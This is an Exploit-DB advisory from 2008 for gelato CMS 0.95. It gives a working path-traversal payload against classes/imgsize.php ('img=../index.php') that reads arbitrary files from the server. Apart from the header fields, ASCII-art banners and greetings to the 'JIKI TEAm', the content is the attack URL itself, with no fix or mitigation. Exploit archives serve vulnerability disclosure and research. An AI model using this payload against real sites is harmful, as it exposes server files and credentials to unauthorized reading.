gelato CMS 0.95 - 'img' Remote File Disclosure

EDB-ID:

6235


Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2008-08-13


=---------------------------------------------=
=                ,.:oO0^-^0Oo:.,              =
=                      JIKO                   =
=                '':0Oov-voO0:''              =
=---------------------------------------------=
----------------------=JIKO=-------------------
| Autor    :> jiko
| Home     :> WwW.No-Exploit.CoM
| Script   :> gelato CMS
| Bug      :> Remote File Disclosure Vulnerability
| Download :> http://www.gelatocms.com/
_______________________________________________
=                   JIKI TEAm                 =
_______________________________________________
| Exploit:
.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
~EX
.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
| Greetz :
.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
----------------------=JIKO=-------------------
=---------------------------------------------=
=                   JIKI TEAm                 =
=---------------------------------------------=

# milw0rm.com [2008-08-13]